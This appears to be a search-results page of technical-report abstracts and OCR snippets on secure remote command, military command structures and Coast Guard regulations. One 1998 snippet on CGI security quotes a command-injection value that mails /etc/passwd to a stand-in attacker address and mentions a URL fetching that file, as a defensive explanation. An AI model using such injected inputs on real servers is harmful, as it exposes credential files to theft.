A data-communication protocol has been devised to enable secure, reliable remote control of processes and equipment via a collision-based network, while using minimal bandwidth and computation. The network could be the Internet or an intranet. Control is made secure by use of both a password and a dynamic key, which is sent transparently to a remote user by the controlled computer (that is, the computer, located at the site of the equipment or process to be controlled, that exerts direct control over the process). The protocol functions in the presence of network latency, overcomes errors caused by missed dynamic keys, and defeats attempts by unauthorized remote users to gain control. The protocol is not suitable for real-time control, but is well suited for applications in which control latencies up to about 0.5 second are acceptable. The encryption scheme involves the use of both a dynamic and a private key, without any additional overhead that would degrade performance. The dynamic key is embedded in the equipment- or process-monitor data packets sent out by the controlled computer: in other words, the dynamic key is a subset of the data in each such data packet. The controlled computer maintains a history of the last 3 to 5 data packets for use in decrypting incoming control commands. In addition, the controlled computer records a private key (password) that is given to the remote computer. The encrypted incoming command is permuted by both the dynamic and private key. A person who records the command data in a given packet for hostile purposes cannot use that packet after the public key expires (typically within 3 seconds). Even a person in possession of an unauthorized copy of the command/remote-display software cannot use that software in the absence of the password. The use of a dynamic key embedded in the outgoing data makes the central-processing unit overhead very small. The use of a National Instruments DataSocket(TradeMark) (or equivalent) protocol or the User Datagram Protocol makes it possible to obtain reasonably short response times: Typical response times in event-driven control, using packets sized .300 bytes, are <0.2 second for commands issued from locations anywhere on Earth. The protocol requires that control commands represent absolute values of controlled parameters (e.g., a specified temperature), as distinguished from changes in values of controlled parameters (e.g., a specified increment of temperature). Each command is issued three or more times to ensure delivery in crowded networks. The use of absolute-value commands prevents additional (redundant) commands from causing trouble. Because a remote controlling computer receives "talkback" in the form of data packets from the controlled computer, typically within a time interval < or =1 s, the controlling computer can re-issue a command if network failure has occurred. The controlled computer, the process or equipment that it controls, and any human operator(s) at the site of the controlled equipment or process should be equipped with safety measures to prevent damage to equipment or injury to humans. These features could be a combination of software, external hardware, and intervention by the human operator(s). The protocol is not fail-safe, but by adopting these safety measures as part of the protocol, one makes the protocol a robust means of controlling remote processes and equipment by use of typical office computers via intranets and/or the Internet.
Alternative Futures: United States Air Force Security Police in the Twenty-First Century
1988-04-01
34What policies should today’s Air Force leadership be pursuing to prepare for tomorrow’s combat support and security police roles?’ The monograph...Further, it addresses the capability of the Air Force to respond to its future combat support and security police missions and their integration into the...security police organizations. His most recent assignments were as the deputy commander of a combat support group and the commander of a security police
Building Security in the Persian Gulf
2010-01-01
developments within ACT, and building on the leadership and success of the outgoing U.S. commander, General James Mattis , U.S. Marine Corps (who retains...following the end of the war in Iraq. The author would like to thank RAND President James Thomson, who supported the development of a proj- ect plan designed...bers from diverse issue backgrounds, all of whom have extensive experience both in research and in policy formulation. These were David Aaron, James
Computer Center Reference Manual. Volume 1
1990-09-30
Unlimited o- 0 0 91o1 UNCLASSI FI ED SECURITY CLASSIFICATION OF THIS PAGE REPORT DOCUMENTATION PAGE la . REPORT SECURITY CLASSIFICATION lb. RESTRICTIVE...with connection to INTERNET ) (host tables allow transfer to some other networks) OASYS - the DTRC Office Automation System The following can be reached...and buffers, two windows, and some word processing commands. Advanced editing commands are entered through the use of a command line. EVE las its own
Code of Federal Regulations, 2010 CFR
2010-10-01
... 46 Shipping 2 2010-10-01 2010-10-01 false Commandant. 50.10-1 Section 50.10-1 Shipping COAST GUARD, DEPARTMENT OF HOMELAND SECURITY (CONTINUED) MARINE ENGINEERING GENERAL PROVISIONS Definition of Terms Used in This Subchapter § 50.10-1 Commandant. The term Commandant means the Commandant U.S. Coast Guard. ...
Inquiry Response Security Issues with CGI Scripting and JAVA Implementations
1998-03-26
that looks like this? nobody@nowhere.com;mail badguys@hell.orgc/etc/ passwd ; Now the open0 statement will evaluate the following command: /usr/lib...sendmail nobody@nowhere.com; mail badguys@hell.orgdetc/ passwd Unintentionally, open0 has mailed the contents of the system password file to the remote...functions outside of the script. For example, the following URL requests a copy of /etc/ passwd from the server machine: http://www.odci.gov/cgi-bin
2002-05-13
the identification of reason as the prime human faculty and virtue, i.e., sense of excellence and practical wisdom as the highest good. These are the...Clothes, " National Security Studies Quarterly Spring 2000, Volume VI, Issue 2, pp. 59-71. 43 Glynis Breakwell and Keith Spacie , Pressures Facing...commander to draw upon, then what is the solution to reduce the stressors highlighted by the Breakwell and Spacie study? Can there be operational
Artificial Intelligence: Expert Systems for Corps Tactical Planning and Other Applications.
1987-03-23
territory; and prepares to continue the attack into East Germany to secure Magdeburg and crossing sites on the Elbe River.. 3. EXECUTION. a. Concept of...14th Armored Cavalry Regiment, and the 22d Aviation Brigade to West Germany . The theater commander assigned the 1 Ith Corps and attached units to the...newly formed Middle Army Group (MIDAG), which had been given responsibility for a sector in the vicinity of Hannover, West Germany . Prior to issuing
Secure Web-based Ground System User Interfaces over the Open Internet
NASA Technical Reports Server (NTRS)
Langston, James H.; Murray, Henry L.; Hunt, Gary R.
1998-01-01
A prototype has been developed which makes use of commercially available products in conjunction with the Java programming language to provide a secure user interface for command and control over the open Internet. This paper reports successful demonstration of: (1) Security over the Internet, including encryption and certification; (2) Integration of Java applets with a COTS command and control product; (3) Remote spacecraft commanding using the Internet. The Java-based Spacecraft Web Interface to Telemetry and Command Handling (Jswitch) ground system prototype provides these capabilities. This activity demonstrates the use and integration of current technologies to enable a spacecraft engineer or flight operator to monitor and control a spacecraft from a user interface communicating over the open Internet using standard World Wide Web (WWW) protocols and commercial off-the-shelf (COTS) products. The core command and control functions are provided by the COTS Epoch 2000 product. The standard WWW tools and browsers are used in conjunction with the Java programming technology. Security is provided with the current encryption and certification technology. This system prototype is a step in the direction of giving scientist and flight operators Web-based access to instrument, payload, and spacecraft data.
Nonlethal weapons as force options for the Army
DOE Office of Scientific and Technical Information (OSTI.GOV)
Alexander, J.B.
This paper suggests that future challenges to US national security will be very different from those previously experienced. In a number of foreseeable circumstances, conventional military force will be inappropriate. The National Command Authority, and other appropriate levels of command, need expanded options available to meet threats for which the application of massive lethal force is counterproductive or inadvisable. It is proposed that nonlethal concepts be developed that provide additional options for military leaders and politicians. Included in this initiative should be exploration of policy, strategy, doctrine, and training issues as well as the development of selected technologies and weapons.more » In addition, civilian law enforcement agencies have similar requirements for less-than-lethal systems. This may be an excellent example for a joint technology development venture.« less
Command and Control Across Space and Cyberspace Domains
2016-02-16
debilitating impact on security, national economic security, national public health or safety, or any combination of those matters.”16).17 From Joint...Third, push control (if not command) to the theater or operational level. Returning to the inbound ICBM scenario proposed by Maj Gen Zabel and detailed
75 FR 20776 - Security Zone; Potomac River, Washington Channel, Washington, DC
Federal Register 2010, 2011, 2012, 2013, 2014
2010-04-21
.... Coast Guard Commandant's Change of Command ceremony from 6 a.m. through 5 p.m. on May 25, 2010. Entry.... Basis and Purpose The Coast Guard will conduct a Change of Command ceremony at Fort McNair in Washington... the U.S. Coast Guard Commandant's Change of Command ceremony. Due to the catastrophic impact a...
Africa Command: U.S. Strategic Interests and the Role of the U.S. Military in Africa
2008-08-22
Phase Zero strategy and TSC, also known as peacetime engagement, see General Charles Wald , “The Phase Zero Campaign,” Joint Force Quarterly, Issue 43, 4th...16 DOD, “News Briefing with Principal Deputy Under Secretary Henry From the Pentagon,” February 7, 2007. 17 See, for example, Lisa Schirch and Aaron...Charles Wald , Member, Military Advisory Board, at a hearing on Climate Change and National Security Threats by the Senate Foreign Relations Committee on May
1982-10-01
CONTRACT OR GRANT NUMBER(e) F19628-82-C-0001 9 PERFORMING ORGANIZATION NAME AND ADDRESS 10. PROGRAM ELEMENT PROJECT, TASK The MITRE Corporation AREA...THiS PAGE(Whum Dam Emma• 19. (Concluded) EUROPEAN VIEW OF COALITION DEFENSE MANAGING C 3 1 NORTH ATLANTIC TREATY ORGANIZATION PACIFIC COMMAND...have a very organization of ESD very signifi- practical warmaking capability. If cantly, going from a iroduct- we must fight, we must be able to
Secure Recognition of Voice-Less Commands Using Videos
NASA Astrophysics Data System (ADS)
Yau, Wai Chee; Kumar, Dinesh Kant; Weghorn, Hans
Interest in voice recognition technologies for internet applications is growing due to the flexibility of speech-based communication. The major drawback with the use of sound for internet access with computers is that the commands will be audible to other people in the vicinity. This paper examines a secure and voice-less method for recognition of speech-based commands using video without evaluating sound signals. The proposed approach represents mouth movements in the video data using 2D spatio-temporal templates (STT). Zernike moments (ZM) are computed from STT and fed into support vector machines (SVM) to be classified into one of the utterances. The experimental results demonstrate that the proposed technique produces a high accuracy of 98% in a phoneme classification task. The proposed technique is demonstrated to be invariant to global variations of illumination level. Such a system is useful for securely interpreting user commands for internet applications on mobile devices.
46 CFR 147.5 - Commandant (CG-522); address.
Code of Federal Regulations, 2011 CFR
2011-10-01
... 46 Shipping 5 2011-10-01 2011-10-01 false Commandant (CG-522); address. 147.5 Section 147.5 Shipping COAST GUARD, DEPARTMENT OF HOMELAND SECURITY (CONTINUED) DANGEROUS CARGOES HAZARDOUS SHIPS' STORES General Provisions § 147.5 Commandant (CG-522); address. Commandant (CG-522) is the Office of Operating...
46 CFR 147.5 - Commandant (CG-OES); address.
Code of Federal Regulations, 2014 CFR
2014-10-01
... 46 Shipping 5 2014-10-01 2014-10-01 false Commandant (CG-OES); address. 147.5 Section 147.5 Shipping COAST GUARD, DEPARTMENT OF HOMELAND SECURITY (CONTINUED) DANGEROUS CARGOES HAZARDOUS SHIPS' STORES General Provisions § 147.5 Commandant (CG-OES); address. Commandant (CG-ENG) is the Office of Design and...
46 CFR 147.5 - Commandant (CG-522); address.
Code of Federal Regulations, 2010 CFR
2010-10-01
... 46 Shipping 5 2010-10-01 2010-10-01 false Commandant (CG-522); address. 147.5 Section 147.5 Shipping COAST GUARD, DEPARTMENT OF HOMELAND SECURITY (CONTINUED) DANGEROUS CARGOES HAZARDOUS SHIPS' STORES General Provisions § 147.5 Commandant (CG-522); address. Commandant (CG-522) is the Office of Operating...
46 CFR 147.5 - Commandant (CG-OES); address.
Code of Federal Regulations, 2013 CFR
2013-10-01
... 46 Shipping 5 2013-10-01 2013-10-01 false Commandant (CG-OES); address. 147.5 Section 147.5 Shipping COAST GUARD, DEPARTMENT OF HOMELAND SECURITY (CONTINUED) DANGEROUS CARGOES HAZARDOUS SHIPS' STORES General Provisions § 147.5 Commandant (CG-OES); address. Commandant (CG-ENG) is the Office of Design and...
46 CFR 147.5 - Commandant (CG-OES); address.
Code of Federal Regulations, 2012 CFR
2012-10-01
... 46 Shipping 5 2012-10-01 2012-10-01 false Commandant (CG-OES); address. 147.5 Section 147.5 Shipping COAST GUARD, DEPARTMENT OF HOMELAND SECURITY (CONTINUED) DANGEROUS CARGOES HAZARDOUS SHIPS' STORES General Provisions § 147.5 Commandant (CG-OES); address. Commandant (CG-OES) is the Office of Operating...
46 CFR 188.10-19 - Commandant.
Code of Federal Regulations, 2011 CFR
2011-10-01
... 46 Shipping 7 2011-10-01 2011-10-01 false Commandant. 188.10-19 Section 188.10-19 Shipping COAST GUARD, DEPARTMENT OF HOMELAND SECURITY (CONTINUED) OCEANOGRAPHIC RESEARCH VESSELS GENERAL PROVISIONS Definition of Terms Used in This Subchapter § 188.10-19 Commandant. This term means the Commandant of the...
46 CFR 188.10-19 - Commandant.
Code of Federal Regulations, 2012 CFR
2012-10-01
... 46 Shipping 7 2012-10-01 2012-10-01 false Commandant. 188.10-19 Section 188.10-19 Shipping COAST GUARD, DEPARTMENT OF HOMELAND SECURITY (CONTINUED) OCEANOGRAPHIC RESEARCH VESSELS GENERAL PROVISIONS Definition of Terms Used in This Subchapter § 188.10-19 Commandant. This term means the Commandant of the...
46 CFR 188.10-19 - Commandant.
Code of Federal Regulations, 2014 CFR
2014-10-01
... 46 Shipping 7 2014-10-01 2014-10-01 false Commandant. 188.10-19 Section 188.10-19 Shipping COAST GUARD, DEPARTMENT OF HOMELAND SECURITY (CONTINUED) OCEANOGRAPHIC RESEARCH VESSELS GENERAL PROVISIONS Definition of Terms Used in This Subchapter § 188.10-19 Commandant. This term means the Commandant of the...
46 CFR 188.10-19 - Commandant.
Code of Federal Regulations, 2013 CFR
2013-10-01
... 46 Shipping 7 2013-10-01 2013-10-01 false Commandant. 188.10-19 Section 188.10-19 Shipping COAST GUARD, DEPARTMENT OF HOMELAND SECURITY (CONTINUED) OCEANOGRAPHIC RESEARCH VESSELS GENERAL PROVISIONS Definition of Terms Used in This Subchapter § 188.10-19 Commandant. This term means the Commandant of the...
46 CFR 188.10-19 - Commandant.
Code of Federal Regulations, 2010 CFR
2010-10-01
... 46 Shipping 7 2010-10-01 2010-10-01 false Commandant. 188.10-19 Section 188.10-19 Shipping COAST GUARD, DEPARTMENT OF HOMELAND SECURITY (CONTINUED) OCEANOGRAPHIC RESEARCH VESSELS GENERAL PROVISIONS Definition of Terms Used in This Subchapter § 188.10-19 Commandant. This term means the Commandant of the...
46 CFR 30.10-17 - Commandant-TB/ALL.
Code of Federal Regulations, 2014 CFR
2014-10-01
... 46 Shipping 1 2014-10-01 2014-10-01 false Commandant-TB/ALL. 30.10-17 Section 30.10-17 Shipping COAST GUARD, DEPARTMENT OF HOMELAND SECURITY TANK VESSELS GENERAL PROVISIONS Definitions § 30.10-17 Commandant—TB/ALL. The term Commandant means the Commandant of the Coast Guard. ...
46 CFR 30.10-17 - Commandant-TB/ALL.
Code of Federal Regulations, 2013 CFR
2013-10-01
... 46 Shipping 1 2013-10-01 2013-10-01 false Commandant-TB/ALL. 30.10-17 Section 30.10-17 Shipping COAST GUARD, DEPARTMENT OF HOMELAND SECURITY TANK VESSELS GENERAL PROVISIONS Definitions § 30.10-17 Commandant—TB/ALL. The term Commandant means the Commandant of the Coast Guard. ...
46 CFR 30.10-17 - Commandant-TB/ALL.
Code of Federal Regulations, 2011 CFR
2011-10-01
... 46 Shipping 1 2011-10-01 2011-10-01 false Commandant-TB/ALL. 30.10-17 Section 30.10-17 Shipping COAST GUARD, DEPARTMENT OF HOMELAND SECURITY TANK VESSELS GENERAL PROVISIONS Definitions § 30.10-17 Commandant—TB/ALL. The term Commandant means the Commandant of the Coast Guard. ...
46 CFR 30.10-17 - Commandant-TB/ALL.
Code of Federal Regulations, 2010 CFR
2010-10-01
... 46 Shipping 1 2010-10-01 2010-10-01 false Commandant-TB/ALL. 30.10-17 Section 30.10-17 Shipping COAST GUARD, DEPARTMENT OF HOMELAND SECURITY TANK VESSELS GENERAL PROVISIONS Definitions § 30.10-17 Commandant—TB/ALL. The term Commandant means the Commandant of the Coast Guard. ...
46 CFR 30.10-17 - Commandant-TB/ALL.
Code of Federal Regulations, 2012 CFR
2012-10-01
... 46 Shipping 1 2012-10-01 2012-10-01 false Commandant-TB/ALL. 30.10-17 Section 30.10-17 Shipping COAST GUARD, DEPARTMENT OF HOMELAND SECURITY TANK VESSELS GENERAL PROVISIONS Definitions § 30.10-17 Commandant—TB/ALL. The term Commandant means the Commandant of the Coast Guard. ...
76 FR 39076 - Western Hemisphere Institute for Security Cooperation Board of Visitors; Meeting
Federal Register 2010, 2011, 2012, 2013, 2014
2011-07-05
... Defense (Policy); Department of State; US Northern Command and US Southern Command meeting on December 3rd... DEPARTMENT OF DEFENSE Department of the Army Western Hemisphere Institute for Security Cooperation Board of Visitors; Meeting AGENCY: Department of the Army, DoD. ACTION: Notice of open meeting. SUMMARY...
75 FR 10446 - Security Zone; Potomac River, Washington Channel, Washington, DC
Federal Register 2010, 2011, 2012, 2013, 2014
2010-03-08
... during the U.S. Coast Guard Commandant's Change of Command ceremony from 6 a.m. through 5 p.m. on May 25... Purpose The Coast Guard will conduct a Change of Command ceremony at Fort McNair in Washington, DC. To... the U.S. Coast Guard Commandant's Change of Command ceremony. Due to the catastrophic impact a...
NASA Technical Reports Server (NTRS)
Dodson, D. W.; Shields, N. L., Jr.
1978-01-01
The Experiment Computer Operating System (ECOS) of the Spacelab will allow the onboard Payload Specialist to command experiment devices and display information relative to the performance of experiments. Three candidate ECOS command and control service concepts were reviewed and laboratory data on operator performance was taken for each concept. The command and control service concepts evaluated included a dedicated operator's menu display from which all command inputs were issued, a dedicated command key concept with which command inputs could be issued from any display, and a multi-display concept in which command inputs were issued from several dedicated function displays. Advantages and disadvantages are discussed in terms of training, operational errors, task performance time, and subjective comments of system operators.
46 CFR 6.06 - Vessels operated by or chartered to Military Sealift Command.
Code of Federal Regulations, 2014 CFR
2014-10-01
... Command. 6.06 Section 6.06 Shipping COAST GUARD, DEPARTMENT OF HOMELAND SECURITY PROCEDURES APPLICABLE TO... by or chartered to Military Sealift Command. (a) Pursuant to the request of the Deputy Secretary of... or chartered to the Military Sealift Command to carry out their assigned missions. (b) An application...
46 CFR 6.06 - Vessels operated by or chartered to Military Sealift Command.
Code of Federal Regulations, 2012 CFR
2012-10-01
... Command. 6.06 Section 6.06 Shipping COAST GUARD, DEPARTMENT OF HOMELAND SECURITY PROCEDURES APPLICABLE TO... by or chartered to Military Sealift Command. (a) Pursuant to the request of the Deputy Secretary of... or chartered to the Military Sealift Command to carry out their assigned missions. (b) An application...
46 CFR 6.06 - Vessels operated by or chartered to Military Sealift Command.
Code of Federal Regulations, 2010 CFR
2010-10-01
... Command. 6.06 Section 6.06 Shipping COAST GUARD, DEPARTMENT OF HOMELAND SECURITY PROCEDURES APPLICABLE TO... by or chartered to Military Sealift Command. (a) Pursuant to the request of the Deputy Secretary of... or chartered to the Military Sealift Command to carry out their assigned missions. (b) An application...
46 CFR 6.06 - Vessels operated by or chartered to Military Sealift Command.
Code of Federal Regulations, 2013 CFR
2013-10-01
... Command. 6.06 Section 6.06 Shipping COAST GUARD, DEPARTMENT OF HOMELAND SECURITY PROCEDURES APPLICABLE TO... by or chartered to Military Sealift Command. (a) Pursuant to the request of the Deputy Secretary of... or chartered to the Military Sealift Command to carry out their assigned missions. (b) An application...
46 CFR 6.06 - Vessels operated by or chartered to Military Sealift Command.
Code of Federal Regulations, 2011 CFR
2011-10-01
... Command. 6.06 Section 6.06 Shipping COAST GUARD, DEPARTMENT OF HOMELAND SECURITY PROCEDURES APPLICABLE TO... by or chartered to Military Sealift Command. (a) Pursuant to the request of the Deputy Secretary of... or chartered to the Military Sealift Command to carry out their assigned missions. (b) An application...
46 CFR 50.10-5 - Coast Guard District Commander or District Commander.
Code of Federal Regulations, 2010 CFR
2010-10-01
... 46 Shipping 2 2010-10-01 2010-10-01 false Coast Guard District Commander or District Commander. 50.10-5 Section 50.10-5 Shipping COAST GUARD, DEPARTMENT OF HOMELAND SECURITY (CONTINUED) MARINE ENGINEERING GENERAL PROVISIONS Definition of Terms Used in This Subchapter § 50.10-5 Coast Guard District...
78 FR 28809 - Reserve Forces Policy Board (RFPB); Notice of Federal Advisory Committee Meeting
Federal Register 2010, 2011, 2012, 2013, 2014
2013-05-16
... Assessment and Program Evaluation; the Deputy Commander, U.S. Cyber Command; Dr. Paul Stockton, former...; and the cost to maintain a strong Reserve Component. Additionally, the Deputy Commander, U.S. Cyber Command, will discuss his views on the increased emphasis placed on cyber security and the logical mission...
Maritime Homeland Command Control: Teaching an Old Dog New Tricks
2002-02-04
Security, Command and Control, Navy, Coast Guard, Customs Service, Centralized Control, Decentralized Execution, Organization by Objectives 15.Abstract...primarily responsible for the maritime homeland, the Navy, the Coast guard, the Customs Service, should provide resources and command capabilities to a...Coast Guard, the Customs Service, should provide resources and command capabilities to a unified command and control structure. Coast Guard forces and
Cyber-Physical Attack-Resilient Wide-Area Monitoring, Protection, and Control for the Power Grid
DOE Office of Scientific and Technical Information (OSTI.GOV)
Ashok, Aditya; Govindarasu, Manimaran; Wang, Jianhui
Cyber security and resiliency of Wide-Area Monitoring, Protection and Control (WAMPAC) applications is critically important to ensure secure, reliable, and economic operation of the bulk power system. WAMPAC relies heavily on the security of measurements and control commands transmitted over wide-area communication networks for real-time operational, protection, and control functions. Also, the current “N-1 security criteria” for grid operation is inadequate to address malicious cyber events and therefore it is important to fundamentally redesign WAMPAC and to enhance Energy Management System (EMS) applications to make them attack-resilient. In this paper, we propose an end-to-end defense-in-depth architecture for attack-resilient WAMPAC thatmore » addresses resilience at both the infrastructure layer and the application layers. Also, we propose an attack-resilient cyber-physical security framework that encompasses the entire security life cycle including risk assessment, attack prevention, attack detection, attack mitigation, and attack resilience. The overarching objective of this paper is to provide a broad scope that comprehensively describes most of the major research issues and potential solutions in the context of cyber-physical security of WAMPAC for the power grid.« less
78 FR 11631 - Reserve Forces Policy Board (RFPB); Notice of Federal Advisory Committee Meeting
Federal Register 2010, 2011, 2012, 2013, 2014
2013-02-19
... meeting will consist of remarks from the Commander of U.S. Southern Command, the Commander of U.S. Cyber.... Commander, USCYBERCOM, has been invited to discuss his views on the increased emphasis placed on cyber security and the logical mission fit for Reserve Component members. Meeting Accessibility: Pursuant to 5 U...
2004-09-01
contributions during combat operations in Iraq. Vice Admiral Timothy J. Keating , U.S. Navy, then commander of the U.S. Fifth Fleet and Naval Forces...Admiral Keating described the boat crews as having been the “first line of defense” for coalition naval forces during the amphibious assault of Iraq’s Al...illegally. This law- enforcement presence to preserve maritime security in the 3.4-million-square-mile American exclusive economic zone also led to the
2008-09-01
the DoD components to project annual investigations within 5% of annual submissions in order to properly staff the OPM investigations programa ...Level97E N/ANavigator Trainee92T1 N/APilot Trainee92T0 N/AWing Commander91W N/AGeneral Officer90G N/AAide- De -Camp88A N/ACommand and Control86P N/AUnited...the Navy and Marine Corps can simply reflect inclusion of clearances from individuals who have transitioned from the Selected Reserves to the
Joint Command Decision Support System
2011-06-01
2010 Olympics and Paralympics games , about a hundred agencies and organizations were involved with the safety and security of the games . Accordingly...Joint Task Force Games (JTFG) staff members were augmented with other Command Staff from Canada Command and Canadian Operational Support Command...CANOSCOM) to create an operational HQ. The scenario used for demonstration was based on fictitious Olympic Games (Breton and Guitouni 2008). The scenario
Taking Up the Security Challenge of Climate Change
2009-08-01
depletion, anthropogenic pollution , and pandemic disease, among other phenomena, all of which pose significant environmental security risks in their...AUTHOR RYMN J. PARSONS is Assistant Counsel to and Environmental Practice Team Leader for Naval Facilities Engineering Command, Mid- Atlantic , located at...Naval Station, Norfolk, VA. Also a Navy Reservist, with the rank of captain, he is Staff Judge Advocate to Commander, Navy Region Mid- Atlantic
78 FR 65300 - Western Hemisphere Institute for Security Cooperation Board of Visitors; Meeting
Federal Register 2010, 2011, 2012, 2013, 2014
2013-10-31
... from the WHINSEC Commandant; Department of State; US Northern Command and US Southern Command; the Office of the Secretary of Defense (Policy); the Board's Subcommittees on Education and Outreach...-2963 or [email protected]us.army.mil . SUPPLEMENTARY INFORMATION: This meeting is open to the public...
46 CFR 188.10-13 - Coast Guard District Commander.
Code of Federal Regulations, 2012 CFR
2012-10-01
... 46 Shipping 7 2012-10-01 2012-10-01 false Coast Guard District Commander. 188.10-13 Section 188.10-13 Shipping COAST GUARD, DEPARTMENT OF HOMELAND SECURITY (CONTINUED) OCEANOGRAPHIC RESEARCH VESSELS GENERAL PROVISIONS Definition of Terms Used in This Subchapter § 188.10-13 Coast Guard District Commander...
46 CFR 188.10-13 - Coast Guard District Commander.
Code of Federal Regulations, 2011 CFR
2011-10-01
... 46 Shipping 7 2011-10-01 2011-10-01 false Coast Guard District Commander. 188.10-13 Section 188.10-13 Shipping COAST GUARD, DEPARTMENT OF HOMELAND SECURITY (CONTINUED) OCEANOGRAPHIC RESEARCH VESSELS GENERAL PROVISIONS Definition of Terms Used in This Subchapter § 188.10-13 Coast Guard District Commander...
46 CFR 188.10-13 - Coast Guard District Commander.
Code of Federal Regulations, 2013 CFR
2013-10-01
... 46 Shipping 7 2013-10-01 2013-10-01 false Coast Guard District Commander. 188.10-13 Section 188.10-13 Shipping COAST GUARD, DEPARTMENT OF HOMELAND SECURITY (CONTINUED) OCEANOGRAPHIC RESEARCH VESSELS GENERAL PROVISIONS Definition of Terms Used in This Subchapter § 188.10-13 Coast Guard District Commander...
46 CFR 188.10-13 - Coast Guard District Commander.
Code of Federal Regulations, 2014 CFR
2014-10-01
... 46 Shipping 7 2014-10-01 2014-10-01 false Coast Guard District Commander. 188.10-13 Section 188.10-13 Shipping COAST GUARD, DEPARTMENT OF HOMELAND SECURITY (CONTINUED) OCEANOGRAPHIC RESEARCH VESSELS GENERAL PROVISIONS Definition of Terms Used in This Subchapter § 188.10-13 Coast Guard District Commander...
46 CFR 188.10-13 - Coast Guard District Commander.
Code of Federal Regulations, 2010 CFR
2010-10-01
... 46 Shipping 7 2010-10-01 2010-10-01 false Coast Guard District Commander. 188.10-13 Section 188.10-13 Shipping COAST GUARD, DEPARTMENT OF HOMELAND SECURITY (CONTINUED) OCEANOGRAPHIC RESEARCH VESSELS GENERAL PROVISIONS Definition of Terms Used in This Subchapter § 188.10-13 Coast Guard District Commander...
32 CFR 770.57 - Entry procedures.
Code of Federal Regulations, 2010 CFR
2010-07-01
..., Portsmouth, NH 03801, Attention: Security Manager (Code 1700). For groups, foreign citizens, and news media, the request must be forwarded to the Commander, Naval Sea Systems Command, for approval. (b) Each...
U.S. Army Special Forces Roles in Asymmetric Warfare
2001-06-01
1Jonathan B . Tucker, “Asymmetric Warfare: An Emerging Threat to U.S. Security,” Forum For Applied Research and Public Policy (Monterey...8Ibid., 34. 9Tucker, 11. 10Ibid., 2. 11 Henry H . Shelton, GEN, USA, Commander in Chief, U.S. Special Operations Command...the Senate Armed Services Committee, “Military Threats and Security Challenges Through 2015,” (Washington: 3 February 2000), 3. 26GEN Henry H
US Africa Command: Paradigm Change for the Combatant Command
2009-01-01
information operations. 5 The ability to attempt the successfully manage all these elements has been referred to as the DIME Ballet , characterizing...3 U.S. National Security Counsel, National Security Strategy 2006, pp 43. 4Austin Bay, "The DIME Ballet " strategypage. com May 24,2005. http...DIME Ballet " May 24,2005. http://www.strategypage.comlon--point/2005524.aspx. (accessed on February 19, 2009). Eisenhower, Dwight. Presidential
Duke of Wellington’s Command of the Spanish Army in the Peninsular War
2017-06-09
SUBJECT TERMS Peninsular War, Spanish Army, Command Structure , International Friction 16. SECURITY CLASSIFICATION OF: 17. LIMITATION OF ABSTRACT...Horse Guards and the Secretary for War and the Colonies, poorly trained and equipped partner armies, the difficulty in creating a unity of command...armies of three nations in the Peninsula. Wellington accepted the daunting challenge of unifying disparate command structures of Spain and Britain
Frogmen on Apollo command module boilerplate flotation collar during recovery
1966-02-22
Apollo command module boilerplate floats in the Atlantic Ocean during a practice recovery exercise. Frogmen in a liferaft and on the flotation collar secure the command module boilerplate for hoisting onto a nearby recovery ship. The exercise was conducted in preparation for the forthcoming Apollo-Saturn 201 (AS-201) mission.
Temperature and Concentration Profiles in Hydrogen-Nitrous Oxide Flames.
1986-07-01
SECumvY CLASSIFICATION CF TIS PAGOE(hn Date. 3.,OCO 20. Abstract (Cont’d): est for flame modeler UNCLASSIFIED * SECURITY CL ASSIrIC ATION Or THIS P...Commander Naval Surface Weapons Center Commander ATTN: R. Bernecker, R-13 US Army Tank Automotive G.B. Wilmot , R-16 Command Silver Spring, MD 20902
Person or Platform: A New Look at Selecting the Air and Missile Defense Commander
2016-05-13
29 Christopher Moran, Lieutenant Commander, USN and Ryan Heilmann, Lieutenant, USN, “The Elephant in the Room: E-2D and Distributed...Lethality,” Center for International Maritime Security (blog), February 25, 2016, http://cimsec.org/the- elephant -in-the-room-e-2d-and-distributed...Ryan Heilmann, Lieutenant, USN. “The Elephant in the Room: E-2D and Distributed Lethality.” Center for International Maritime Security (blog
2002-04-09
20 AIRPORT SECURITY .............................................................................................. 20...using an existing command and control structure. Since September 11, 2001 airport security has been of heightened importance to the American public...In order to use Reserves to provide airport security the airports themselves should be made federal property. This would allow greater flexibility for
Conference room 211, adjacent to commander's quarters, with vault door ...
Conference room 211, adjacent to commander's quarters, with vault door at right. Projection area at center is equipped with automatic security drapes. Projection room uses a 45 degree mirror to reflect the image onto the frosted glass screen. Door on far left leads to display area senior battle staff viewing bridge, and the commander's quarters - March Air Force Base, Strategic Air Command, Combat Operations Center, 5220 Riverside Drive, Moreno Valley, Riverside County, CA
33 CFR 1.05-5 - Marine Safety and Security Council.
Code of Federal Regulations, 2011 CFR
2011-07-01
... 33 Navigation and Navigable Waters 1 2011-07-01 2011-07-01 false Marine Safety and Security... SECURITY GENERAL GENERAL PROVISIONS Rulemaking § 1.05-5 Marine Safety and Security Council. The Marine... Commandant and is the focal point of the Coast Guard regulatory system. The Marine Safety and Security...
33 CFR 1.05-5 - Marine Safety and Security Council.
Code of Federal Regulations, 2014 CFR
2014-07-01
... 33 Navigation and Navigable Waters 1 2014-07-01 2014-07-01 false Marine Safety and Security... SECURITY GENERAL GENERAL PROVISIONS Rulemaking § 1.05-5 Marine Safety and Security Council. The Marine... Commandant and is the focal point of the Coast Guard regulatory system. The Marine Safety and Security...
33 CFR 1.05-5 - Marine Safety and Security Council.
Code of Federal Regulations, 2013 CFR
2013-07-01
... 33 Navigation and Navigable Waters 1 2013-07-01 2013-07-01 false Marine Safety and Security... SECURITY GENERAL GENERAL PROVISIONS Rulemaking § 1.05-5 Marine Safety and Security Council. The Marine... Commandant and is the focal point of the Coast Guard regulatory system. The Marine Safety and Security...
33 CFR 1.05-5 - Marine Safety and Security Council.
Code of Federal Regulations, 2012 CFR
2012-07-01
... 33 Navigation and Navigable Waters 1 2012-07-01 2012-07-01 false Marine Safety and Security... SECURITY GENERAL GENERAL PROVISIONS Rulemaking § 1.05-5 Marine Safety and Security Council. The Marine... Commandant and is the focal point of the Coast Guard regulatory system. The Marine Safety and Security...
Acquisition of Armored Vehicles Purchased Through Contract W914NS-05-M-1189
2005-10-21
vehicles. Results. The Multi-National Security Transition Command – Iraq (MNSTC-I) purchased seven armored Mercedes - Benz vehicles that did not have...contractor to provide seven armored Mercedes - Benz vehicles. The vehicles were to be used by the Multi-National Security Transition Command (MNSTC-I) to...ability to provide the vehicles immediately. The contract called for the delivery of seven Mercedes - Benz sedans at a price of $135,000 per vehicle that
2009-01-01
